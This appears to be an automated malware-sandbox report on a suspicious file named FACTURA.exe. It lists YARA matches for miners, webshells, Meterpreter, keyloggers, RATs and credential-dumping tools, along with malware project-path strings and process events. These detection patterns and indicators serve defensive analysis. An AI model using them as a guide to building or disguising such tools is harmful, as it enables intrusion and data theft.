Source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6352553916.00000197A34AB000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Deletes files inside the Windows folder
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p
Creates files inside the system directory
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4
PE file contains executable resources (Code or Archives)
Source: MpAsDesc.dll.mui18.45.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: MpAsDesc.dll.mui2.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.45.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.45.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.45.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.45.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.45.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: FACTURA.exe, 00000001.00000000.2845557618.000000000041B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCounterfoil7.exe vs FACTURA.exe
Source: FACTURA.exe, 00000001.00000000.2904734110.0000000002AE0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCounterfoil7.exeFE2XCollides Systems, Inc. vs FACTURA.exe
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe Process token adjusted: Security
Yara detected Winexe tool
Source: Yara match File source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Source: FACTURA.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FACTURA.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: classification engine Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@13/235@1/0
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Microsoft Visual Studio\VB98\pjtAwsVariantioner.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: vbSendMail.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: 0Desktop\war\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: SN.+\\(BotSupho Compiler|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: B=.+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: `D:\Master\bb_soft\n_07_10_2008\bb_bho\VBBHO.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: ao com erro\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: mt Download .vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: 0FileEZ HTTP\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: PE:\Coba Software\Virus\BRR\MOTTO_BRR.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: D:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: D:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: 4/.+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: :D:\Master\bb_soft\new\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: P\AYO.vbp
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: \WINDOWS.VBP]
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: .+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: ?:.+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: DC:\Base de donnee\test\Projet1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: -(.+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: Desktop\Russia\Error.vbp
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: :5.+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: .vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: BD:\Master\bb_soft\not_est\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: GBD:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: C>:\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: D:\\Apple\\VB.*google\\.*\.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: 8my programs\I_R\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: \gugu.vbp]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: hider\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: :Black Dream\Server\Server.vbp]
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: d_C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: |C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp
Source: C:\Users\user\Desktop\FACTURA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\FACTURA.exe 'C:\Users\user\Desktop\FACTURA.exe'
Source: C:\Users\user\Desktop\FACTURA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848
Source: C:\Users\user\Desktop\FACTURA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 856
Source: unknown Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe' /q WD
